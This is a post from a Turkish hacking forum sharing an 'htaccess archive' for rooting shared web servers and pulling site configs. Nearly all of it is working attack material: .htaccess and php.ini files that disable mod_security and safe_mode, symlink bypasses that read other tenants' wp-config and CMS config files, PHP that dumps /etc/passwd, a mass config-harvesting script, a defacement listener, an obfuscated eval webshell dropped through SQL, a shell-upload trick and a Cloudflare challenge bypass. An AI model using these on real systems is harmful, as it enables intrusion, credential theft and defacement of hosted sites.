Httacces Arşivim

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Onaylı Üye
Katılım
11 Şub 2019
Mesajlar
62
Tepki puanı
21
Yaş
35
7 HİZMET YILI
Selamün aleyküm sayın MemoryHackers Takipçileri, Httacces arşivimi sizin ile paylaştım, sunucu rootlarken config çekerken işinize yarabilir umarım yarar


Kod:
Forbidden 403
.htaccess
Options all DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
====================================================================
Forbidden 403
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
====================================================================
Forbidden 404
HeaderName config.txt
ReadmeName config.txt
footerName config.txt
====================================================================
/ln -s/home/örnek/public_html/config.txt/
====================================================================

.htaccess 1 LiteSpeed Hack Method
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
====================================================================
.htacces 2 LiteSpeed Hack Method
<?php
//(c)
$filename = dirname(__FILE__).-/.htaccess";

$fp = fopen($filename, "w");
(fwrite($fp));
(fwrite($fp,  "Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any"));
fclose($fp); 
====================================================================
.htacces 3 LiteSpeed Hack Method
Options +FollowSymLinks
DirectoryIndex seees.html
RemoveHandler .php
AddType application/octet-stream .php
====================================================================
.htacces 4 LiteSpeed Hack Method
<Files *.php>
ForceType application/x-httpd-php4
</Files>
====================================================================
safe mode .htaccess
# BEGIN safe mode
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
# END safe mode

ini.php
<?
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GETsansursansursansur91;"file"sansursansursansur93;);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GETsansursansursansur91;"ss"sansursansursansur93;);
?>
//
php.ini
safe_mode = off
exec = On
shell_exec = On
====================================================================


htaccess Pl Çalıştır
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType applicationx-httpd-cgi .net
AddHandler cgi-script .net
AddHandler cgi-script .net
====================================================================
htaccess.Pl2
Options FollowSymLinks MultiViews Indexes ExecCGI
AddType application/x-httpd-cgi .net
AddHandler cgi-script .net
AddHandler cgi-script .net
====================================================================
htaccess pl gif çalıştırma
addhandler cgi-script .gif
====================================================================
Htaccess .shtml Parsed
Options +Includes
AddType text/html .shtml
AddHandler server-parsed .shtml
====================================================================
htaccess dizin
#deny all access
deny from all
====================================================================
htaccess dizin2
Options +Indexes +MultiViews +FollowSymlinks
IndexOptions FancyIndexing
====================================================================
htaccess follow
Options +FollowSymlinks
====================================================================
htaccess follow 2
Options +FollowSymLinks
DirectoryIndex seees.html
Options +Indexes
====================================================================
htaccess follow 3
Options +Indexes +MultiViews +FollowSymlinks
IndexOptions FancyIndexing
DirectoryIndex blabla.htm
====================================================================
htaccess follow 4
Options +FollowSymLinks
DirectoryIndex sas
====================================================================
htaccess php parsed
Options +FollowSymLinks
DirectoryIndex seees.html
RemoveHandler .php
AddType application/octet-stream .php
====================================================================
htaccess php parsed 2
AddType application/octet-stream .php
====================================================================
php versiyon
AddType application/x-httpd-php5 .php
====================================================================
htaccess filtrele
<IfModule mod_security.c>
SecFilterScanPOST Off
</IfModule>
====================================================================
htaccess filtrele 2
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
====================================================================
suPhp php.ini Çalıştır
suPHP_ConfigPath /home/ogi/public_html/cra/php.ini
====================================================================
XSS Filtreleme
RewriteEngine On
RewriteCond %{QUERY_STRING} base64_encode.*\\(.*\\) [OR]
RewriteCond %{QUERY_STRING} (\\<|<).*script.*(\\>|>) [NC,OR]
RewriteCond %{QUERY_STRING} GLOBALS(=|\\[|\\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\\[|\\%[0-9A-Z]{0,2})
RewriteRule ^(.*)$ index.php [F,L]
====================================================================
htaccess Site Yönlendirme
AuthName "Dr.Art'st Co"
ErrorDocument 403 TURKZ GRUP - Devlet-i Ebed Müddet
Order deny,allow
Deny from all
Allow from 192.168.3.5
====================================================================
CXS Bypass ve Forbidden Not Found
Options all
ForceType text/plain
AddType text/plain .php
AddType text/plain .html
AddHandler server-parsed .php
AddHandler txt .php
====================================================================
Geliştirilmiş Forbidden .htaccess
OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
Options Indexes FollowSymLinks
ForceType text/plain
AddType text/plain .php
AddType text/plain .html
AddType text/html .shtml
AddType txt .php
AddHandler server-parsed .php
AddHandler txt .php
AddHandler txt .html
AddHandler txt .shtml
Options All
Options All
ReadmeName deneme.txt
====================================================================
/Not/
aynı mantık ile ln -s /home/user/public_html/config.php deneme.txt
ekrana yansıtıyoruz. not : her serverde işe yaramaz
her swnin kendi mantıka göre gecilme yöntemleri var.
====================================================================
CXS Server Cgi Yememe Sorunu .htaccess
htaccess :
Options +FollowSymLinks +Indexes
DirectoryIndex default.html
## START ##
Options +ExecCGI
AddHandler cgi-script log cgi pl tg love h4 tgb x-zone
AddType application/x-httpd-php .jpg
RewriteEngine on
RewriteRule (.*)\war$ .log
## END ##
====================================================================
Symlink Perl

#!/usr/bin/perl
# TG//
symlink ("/home/kroist/public_html/","/home/banyansp/public_html/cra/2");
print "Content-type: text/html\\n\\n";
open (THISFILE,"aria.txt");
foreach $line()
{
print "$line<br>\\n";
}
close (THISFILE);
====================================================================
etc passwd çekme methodu
etc.php diye dosya oluşturun içine bu komutları yapıştırın.

<?php
for($uid=0;$uid<2000;$uid++){ //cat /etc/passwd
$nothing = posix_getpwuid($uid);
if (!empty($nothing)) {
while (list ($key, $val) = each($nothing)){
print "$val:";
}
print "<br />";
}
}
?>
====================================================================
Safe Mod Off Disabled Fonk, Mod Security
<body text="#FFFFFF" bgcolor="#000000">
<?php
echo "<html>
<center>
<img border=2 src=http://img237.imageshack.us/img237/2972/bannerwa8.jpg width=429 height=97><br>
<head>
<title>Safe Mode - Security_Mod - For Disable Functions Fucked lol xD </title>
<meta http-equiv='pragma' content='no-cache'>
</head><body>";
$fp = fopen("php.ini","w+");
fwrite($fp,"safe_mode = Off
disable_functions =
safe_mode_gid = OFF
open_basedir = OFF ");
echo "<b><font color=darkred><BR>[*] Safe Mode OFF yap�l�yor ... <BR>[*] islem Tamamlandi oK !<br><br><br><br>";
$fp2 = fopen(".htaccess","w+");
fwrite($fp2,"<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckUnicodeEncoding Off
</IfModule> ");
echo "<BR>[*] Security_Mod aktif ediliyor ... <BR>[*] islem Tamamlandi oK ! ";
?>
<BR><BR><BR><BR>
</center>
====================================================================
- [ Bypass Directory ]-
<Directory "/home/user/public_html">
Options -ExecCGI
AllowOverride AuthConfig Indexes Limit FileInfo options=IncludesNOEXEC,Indexes,Includes,MultiViews ,SymLinksIfOwnerMatch,FollowSymLinks
</Directory>


Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
====================================================================
htaccess bypass LiteSpeed
[ Bypass Litespeed ]
wew.shtml do ==> ln -ls /home/user/public_html/configuration.php wew.shtml

.htaccess
Options +FollowSymLinks
DirectoryIndex chesss.html
RemoveHandler .php
AddType application/octet-stream .php
====================================================================
- [ Bypass OVH ]-
.htaccess Olarak Kaydedin Server'a Atın

Options +FollowSymLinks
DirectoryIndex Index.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType root .root
AddHandler cgi-script .root
AddHandler cgi-script .root

php.ini Olarak Kaydedin Server'a Atın

safe_mode = Off disable_functions =
safe_mode_gid = Off
open_basedir = Off
register_globals = on
exec = On shell_exec = On ln -s /.zer0day
====================================================================
c1 bypass kodları
tar -xvf c1.tar.gz
tar zxvf c1.tar.gz
C1/1/var/named Yada ;
C1/var/www/vhosts Bu Swden Swye Değişiyor

Config Çekmek İçin
/home/deneme/public_html/site1/
====================================================================
etc passwd çekme Methodu
etc.php diye dosya oluşturun ve içine bu komutları yapıştırın.

<?php
for($uid=0;$uid<2000;$uid++){ //cat /etc/passwd
$nothing = posix_getpwuid($uid);
if (!empty($nothing)) {
while (list ($key, $val) = each($nothing)){
print "$val:";
}
print "<br />";
}
}
?>
====================================================================
port mass tool => perl mass.pl

#!/usr/bin/perl -w
use strict;
use IO::Socket;

sub Wait {
wait;
}

$SIG{CHLD} = \&Wait;

my $server = IO::Socket::INET->new(
LocalPort => 1148,
Type => SOCK_STREAM,
Reuse => 1,
Listen => 10) or die "$@\n";
my $client ;

while($client = $server->accept()) {
select $client;
print $client "HTTP/1.0 200 OK\r\n";
print $client "Content-type: text/p\r\n\r\n";
print $client '<html>
<center>
<h1>Hacked By Zer0day ---</h1>
</center>
</html>';
}
continue {
close($client);
kill CHLD -> -$$;
}
====================================================================
a.sql
normal txt aç kodları yapıstır a.sql diye kaydet

system/logs/isim.php
system/storage/logs


SELECT '<?php eval (gzinflate(base64_decode(str_rot13("ML/EF8ZjRZnsUrk/hVMOJaQZS19pZ3kkVNtX06qEFgnxAct0bH2RGin/zljgT/c2q9
/iih+BI40TaSguWq98TXxc4k0pOiufqT+K7WvibboK8kxCfTyZ6IddrWcAV5mKhyANXlg0FkNPkJ2wTHUTrlQtoJHUjjyFGycunTqKtI8lnvzPLRJ
DT6ZEPUoIKJWkYyewYRFaJxt+epn6S0qs39+umDuTfsEJnSmd3HRWTkCv/WgX54K4g98833KBSUHXv/Ygqsr+k4USOENPRjxM/ZkaAk56eYDM0xJ5
sK552h1khNHKr2lIXpZOhYvSs2VHZh8O8oKbPibYUutxFLYKpCY2KCo8Y7ByDy6D0l8=")))); ?>' FROM `mouwaffek_table`
====================================================================
Shell Upload txt bypass

AddType application/x-httpd-php .txt
yazın icine ve shellinize site.com/img/shell.txt
====================================================================
====================================================================
====================================================================
====================================================================
====================================================================
PHP Symnlik Open Basedir Restriction vulnerability php 5.2.12-5.3.1 Symlink Bypass

Options Indexes FollowSymLinks
DirectoryIndex linuxsec.htm
AddType txt .php
AddHandler txt .php
====================================================================
====================================================================
====================================================================
====================================================================
====================================================================
LiteSpeed Symnlink 403 Forbidden Bypass

python shell , CGI PERL Shell
and .htaccess
the htaccess code is
Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
<IfModule mod_autoindex.c>
IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble
</ifModule>
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>
Options +FollowSymLinks
DirectoryIndex Sux.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
===============
what we should do ?
just open the cgi bypass shell
and do sym
ln -s /home/user/public_html/wp-config.php 1.txt
then
cat 1.txt
====================================================================
====================================================================
====================================================================
====================================================================
====================================================================
LiteSpeed Bypass Symlink

OPTIONS Indexes Includes ExecCGI FollowSymLinks
AddHandler txt .php
AddHandler cgi-script .pl
AddHandler cgi-script .pl
OPTIONS Indexes Includes ExecCGI FollowSymLinks
Options Indexes FollowSymLinks
AddType txt .php
AddType text/html .shtml
Options All
Options All
====================================================================
====================================================================
====================================================================
====================================================================
Server Error Bypass Hatası Çözümü

.htaccess

#Bypass By Zer0day
<DIRECTORY /..../user/..../>
OPTIONS Indexes ExecCGI FollowSymLinks
AllowOverride All
</DIRECTORY>
AddType txt .php
AddHandler txt .php


php.ini

#Bypassed zer0day..
safe_mode = OFF
disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF
register_globals = ON
exec = ON
shell_exec = ON
====================================================================
====================================================================
====================================================================
====================================================================
====================================================================
İnclude Symlink
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
DirectoryIndex new
DirectoryIndex config.ini
====================================================================
====================================================================
====================================================================
====================================================================
====================================================================
.htaccess Destroyer Kodu

Addhandler written by Zer0day
DirectoryIndex index.html
<Directory />
Options FollowSymLinks
Options All +Indexes +FollowSymLinks
Options All +ExecCGI
Options All +Indexes
Options All +FollowSymLinks
Options All +SymLinksIfOwnerMatch
Options All +MultiViews
Options All +Includes
Options All +IncludesNOEXEC
Options All +IndexOptions +FancyIndexing
AllowOverride None
AllowOverride All
order allow,deny
allow from all
</Directory>
AddType text/plain .php
AddType text/plain .htaccess
AddHandler server-parsed .php
Addhandler cgi-script .asp
ForceType application/x-httpd-php4
HeaderName 1.txt
ReadmeName 1.txt
AddDefaultCharset utf-8
RewriteEngine On
RewriteRule ^sitemap.xml/?$ md_sitemap.php [QSA,NC,L]
RewriteRule ^src/(.*)/page/([0-9]+)/?$ index.php?src=$1&page=$2 [QSA,NC,L]
RewriteRule ^src/(.*)/?$ index.php?src=$1 [QSA,NC,L]
RewriteRule ^web/(.*) web.php?url=$1 [QSA,NC,L]
RewriteRule (.*)\.was$ $1.was
RewriteRule .* – [E=HTTP_AUTHORIZATION:%{HTTP:Authorization},L]
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} -f [OR]
RewriteCond %{REQUEST_FILENAME} -d
RewriteRule ^(.+) – [PT,L]
RewriteRule ^(.*) index.php
</IfModule>
<IfModule Mod_security.c>
SecFilterEngine OFF SecFilterEngine OFF
SecFilterScanPort OFF SecFilterScanPort OFF
SecFilterCheckURLEncoding OFF SecFilterCheckURLEncoding OFF
SecFilterCheckUnicodeEncoding OFF SecFilterCheckUnicodeEncoding OFF
RewriteRule (.*)\.was$ $1.was
</IfModule> </ IfModule>
====================================================================
====================================================================
====================================================================
====================================================================
====================================================================
Bypass Symlink With .htaccess
<Directory "/home/user/public_html">
Options -ExecCGI
AllowOverride AuthConfig Indexes Limit FileInfo options=IncludesNOEXEC,Indexes,Includes,MultiViews ,SymLinksIfOwnerMatch,FollowSymLinks
</Directory>
====================================================================
====================================================================
====================================================================
====================================================================
====================================================================
Bypass Symlink via .htaccess 2016
.htaccess
Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any
====================================================================
====================================================================
====================================================================
====================================================================
====================================================================
Bypass Passwd LiteSpeed

OPTIONS Indexes Includes ExecCGI FollowSymLinks
AddHandler txt .php
AddHandler cgi-script .cgi
AddHandler cgi-script .pl
OPTIONS Indexes Includes ExecCGI FollowSymLinks
Options Indexes FollowSymLinks
AddType txt .php
AddType text/html .shtml
Options All
Options All
====================================================================
====================================================================
====================================================================
====================================================================
====================================================================
Bypass zer000
wew.shtml
do ==> ln -ls /home/user/public_html/configuration.php wew.shtml
.htaccess
Options +FollowSymLinks
DirectoryIndex chesss.html
RemoveHandler .php
AddType application/octet-stream .php
====================================================================
====================================================================
====================================================================
Bypass LiteSpeed

Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
====================================================================
====================================================================
====================================================================
====================================================================
Apache Server Bypass

<?php
if($_POST['jembud']){
@mkdir("vhost_c7e", 0777);
@chdir("vhost_c7e");
system("ln -s / root");
$htaccess="
Options Indexes FollowSymLinks
DirectoryIndex ngeue.htm
AddType text/plain .php
AddHandler text/plain .php
Satisfy Any";
@file_put_contents(".htaccess",$htaccess);
$etcp=$_POST['passwd'];

$etcp=explode("\n",$etcp);
foreach($etcp as $passwd){
$pawd=explode(":",$passwd);
$user =$pawd[5];
$jembod = preg_replace('/\/var\/www\/vhosts\//', '', $user);
if (preg_match('/vhosts/i',$user)){
system("ln -s ".$user."/httpdocs/wp-config.php ".$jembod."-Wordpress.txt");
system("ln -s ".$user."/httpdocs/configuration.php ".$jembod."-Joomla.txt");
system("ln -s ".$user."/httpdocs/config/koneksi.php ".$jembod."-Lokomedia.txt");
system("ln -s ".$user."/httpdocs/forum/config.php ".$jembod."-phpBB.txt");
system("ln -s ".$user."/httpdocs/sites/default/settings.php ".$jembod."-Drupal.txt");
system("ln -s ".$user."/httpdocs/config/settings.inc.php ".$jembod."-PrestaShop.txt");
system("ln -s ".$user."/httpdocs/app/etc/local.xml ".$jembod."-Magento.txt");
system("ln -s ".$user."/httpdocs/admin/config.php ".$jembod."-OpenCart.txt");
system("ln -s ".$user."/httpdocs/config.php ".$jembod."-OpenCart1.txt");
system("ln -s ".$user."/httpdocs/application/config/database.php ".$jembod."-Ellislab.txt");
system("ln -s ".$user."/httpdocs/inc/connect.php ".$jembod."-Parallels.txt");
system("ln -s ".$user."/httpdocs/inc/config.php ".$jembod."-MyBB.txt");

}
}
echo "<center><a href='vhost_c7e/root/'><u>Çek</u></a><br><a href='vhost_c7e/'><u>Config</u></a>";
}else{
echo "<center><form method='POST' action=''>
<textarea name='passwd' rows='15' cols='60'>";
echo include("/etc/passwd");
echo "</textarea>";
echo "<br><br>";
echo "<input type='submit' name='jembud' value='tamam!'></center>";
}
===================================================================
cat etc passwd çekme

<?php // reis Bypassed
if ($_GET[id]=="passwd"){
for($uid=0;$uid<2000;$uid++){ //cat /etc/passwd
$nothing = posix_getpwuid($uid);
if (!empty($nothing)) {
while (list ($key, $val) = each($nothing)){
print "$val:";
}
print "<br />";
}
}
}
?>
===================================================================
Açık Tarama Engelleme
Not => .htaccess dosyamızın içine aşağıdaki kodları aynen yapıştırıyoruz ve sitemizde açık tarayan programları engellemiş oluyoruz.
Not => Açık tarama programları kod içine eklenebilir.

RewriteEngine On
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_USER_AGENT} ^w3af.sourceforge.net [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dirbuster [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nikto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} SF [OR]
RewriteCond %{HTTP_USER_AGENT} sqlmap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} fimap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nessus [NC,OR]
RewriteCond %{HTTP_USER_AGENT} whatweb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Openvas [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jbrofuzz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} libwhisker [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webshag [NC,OR]
RewriteCond %{HTTP:Acunetix-Product} ^WVS
RewriteRule ^.* http://127.0.0.1/ [R=301,L]
</IfModule>
====================================================================
====================================================================
====================================================================
====================================================================
====================================================================
ClodFlare Bypass

<?php
if($argc != 5) {
echo "Usage: php $argv[0] Overview (proxy list set to none if none)(threads)(time)\n";
die();
}
function get_between($string,$start,$end)
{
$string = " ".$string;
$ini = strpos($string, $start);
if($ini==0) return "";
$ini += strlen($start);
$len = strpos($string, $end, $ini) - $ini;

return substr($string, $ini, $len);
}
function rand_line($fileName, $maxLineLength = 7096) {
$handle = @fopen($fileName, "r");
if ($handle) {
$random_line = null;
$line = null;
$count = 0;
while (($line = fgets($handle, $maxLineLength)) !== false) {
$count++;
if(rand() % $count == 0) {
$random_line = $line;
}
}
if (!feof($handle)) {
echo "Error: unexpected fgets() fail\n";
fclose($handle);
return null;
} else {
fclose($handle);
}
return $random_line;
}
}
function bypassyourdog($domain, $useragent, $proxy) {
$cURL = curl_init();
curl_setopt($cURL, CURLOPT_URL, $domain);
curl_setopt($cURL, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($cURL, CURLOPT_HEADER, 1);
curl_setopt($cURL, CURLOPT_USERAGENT, $useragent);
curl_setopt($cURL, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($cURL, CURLOPT_PROXY, $proxy);
curl_setopt($cURL, CURLOPT_COOKIEFILE, "cookie.txt");
$string = curl_exec($cURL);
curl_close($cURL);
$domain = get_between($string, '</span> ', '.</h1>');
$jschl_vc = get_between($string, '"jschl_vc" value="', '"/>');
$pass = get_between($string, '"pass" value="', '"/>');
$settimeout = get_between($string, 'setTimeout(function(){', 'f.submit()');
$mathvariables = get_between($settimeout, 'var t,r,a,f, ', ';');
$mathvariable = explode('=', $mathvariables);
$mathvariable1 = get_between($mathvariables, '{"', '":');
$mathvariable2 = $mathvariable[0].".".$mathvariable1;
$math1 = get_between($mathvariables, '":', '}');
$math2 = $mathvariable[0].get_between($settimeout, ";".$mathvariable[0], ';a.value');
$fuck = 0;
$math2s = explode(';', $math2);
$mathtotal = 0;
$answers = array();
$totalformath1 = 0;
//echo "Domain: $domain\nJSCHL_VC: $jschl_vc\nPASS: $pass\nSet Timeout: $settimeout\n";
if($pass == NULL) {
file_put_contents('log.txt', $string, FILE_APPEND);
}
if(get_between($math1, '((', '))') != NULL) {
$dog311 = get_between($math1, '((', '))');
$math1ss = explode(')', $dog311);
$math1sss = explode('+', $math1ss[0]);
$math1ssss = explode('(', $dog311);
$math1sssss = explode('+', $math1ssss[1]);
$ifuckdog = 0;
$ufuckdog = 0;
foreach($math1sss as $imoutofvars2) {
if ($imoutofvars2 == "!" || $imoutofvars2 == "!![]" || $imoutofvars2 == "![]") {
$ifuckdog++;
}
}
foreach($math1sssss as $imoutofvars3) {
if ($imoutofvars3 == "!" || $imoutofvars3 == "!![]" || $imoutofvars3 == "![]") {
$ufuckdog++;
}
}
$totalformath1 = $ifuckdog.$ufuckdog;
array_push($answers, $totalformath1." +");
} else {
$math1ss = explode('+', $math1);
foreach($math1ss as $fuckmydog){
if ($fuckmydog == "!" || $fuckmydog == "!![]" || $fuckmydog == "![]") {
$totalformath1++;
}
}
array_push($answers, $totalformath1." +");
}
foreach($math2s as $dog123){
$typeofmath = substr($dog123, strlen($mathvariable2), 1);
if(get_between($dog123, '((', '))') != NULL) {
$dog321 = get_between($dog123, '((', '))');
$poop = 0;
$shit = 0;
$mathss = explode(')', $dog321);
$mathsss = explode('+', $mathss[0]);
$mathssss = explode('(', $dog321);
$mathsssss = explode('+', $mathssss[1]);
foreach($mathsss as $imoutofvars) {
if ($imoutofvars == "!" || $imoutofvars == "!![]" || $imoutofvars == "![]") {
$poop++;
}
}
foreach($mathsssss as $imoutofvars1) {
if ($imoutofvars1 == "!" || $imoutofvars1 == "!![]" || $imoutofvars1 == "![]") {
$shit++;
}
}
$fuck = $poop.$shit;
array_push($answers, $fuck." ".$typeofmath);
$fuck = 0;
} else {
$fuckingdogs = explode('=', $dog123);
$fuckingcats = explode('+', $fuckingdogs[1]);
foreach($fuckingcats as $idinglecats) {
if ($idinglecats == "!" || $idinglecats == "!![]" || $idinglecats == "![]") {
$fuck++;
}
}
array_push($answers, $fuck." ".$typeofmath);
$fuck = 0;
}
}
foreach($answers as $answer) {
$ilikedogs = explode(' ', $answer);
switch($ilikedogs[1]) {
case "+":
$mathtotal = $mathtotal + $ilikedogs[0];
break;
case "-":
$mathtotal = $mathtotal - $ilikedogs[0];
break;
case "*":
$mathtotal = $mathtotal * $ilikedogs[0];
break;
}
}
$jschl_answer = strlen($domain) + $mathtotal;
$domain1 = $domain."/cdn-cgi/l/chk_jschl?jschl_vc=$jschl_vc&pass=$pass&jschl_answer=$jschl_answer";
usleep(3000000);
$cURL1 = curl_init();
curl_setopt($cURL1, CURLOPT_URL, $domain1);
curl_setopt($cURL1, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($cURL1, CURLOPT_HEADER, 1);
curl_setopt($cURL1, CURLOPT_USERAGENT, $useragent);
curl_setopt($cURL1, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($cURL1, CURLOPT_PROXY, $proxy);
curl_setopt($cURL1, CURLOPT_COOKIEFILE, "cookie.txt");
$test = curl_exec($cURL1);
$cfuid = get_between($test, '__cfduid=', '; expires');
$cf_clearance = get_between($test, 'cf_clearance=', '; expires');
echo '__cfduid='.$cfuid.'; cf_clearance='.$cf_clearance."\n";
return '__cfduid='.$cfuid.'; cf_clearance='.$cf_clearance;
}
$useragents = array(
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0 RestSharp 102.0.0.0",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
"Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
"Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Opera/9.80 (Windows NT 5.1; U; cs) Presto/2.2.15 Version/10.00",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; )",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_5; en-us) AppleWebKit/525.26.2 (KHTML, like Gecko) Version/3.2 Safari/525.26.12",
"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
"Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; cs; rv:1.9.0.5) Gecko/2009021916 Songbird/1.1.2 (20090331142126)",
"Mozilla/5.0 (iPhone; CPU iPhone OS 6_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
"Mozilla/5.0 (X11; U; Linux; cs-CZ) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) rekonq",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows XP 5.1) Lobo/0.98.4",
"X-Smiles/1.2-20081113",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008120120 Blackbird/0.9991",
"Mozilla/5.0 (SCH-F859/F859DG12;U;NUCLEUS/2.1;Profile/MIDP-2.1 Configuration/CLDC-1.1;480*800;CTC/2.0) Dolfin/2.0",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.10) Gecko/20100914 Conkeror/0.9.3",
"LeechCraft (X11; U; Linux; ru_RU) (LeechCraft/Poshuku 0.3.55-324-g9365f23; WebKit 4.5.2/4.5.2)",
"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.8) Gecko/20100317 Postbox/1.1.3",
"xine/1.1.16.3",
"Bunjalloo/0.7.6(Nintendo DS;U;en)",
"Mozilla/5.0 (X11; U; Linux i686; en-US; SkipStone 0.8.3) Gecko/20020615 Debian/1.0.0-3 ",
"Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60",
"MMozilla/5.0 (Windows; U; Windows NT 6.1; cs-CZ) AppleWebKit/533.3 (KHTML, like Gecko) QupZilla/1.1.5 Safari/533.3",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)",
"Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
"Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
"Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)",
"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1",
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
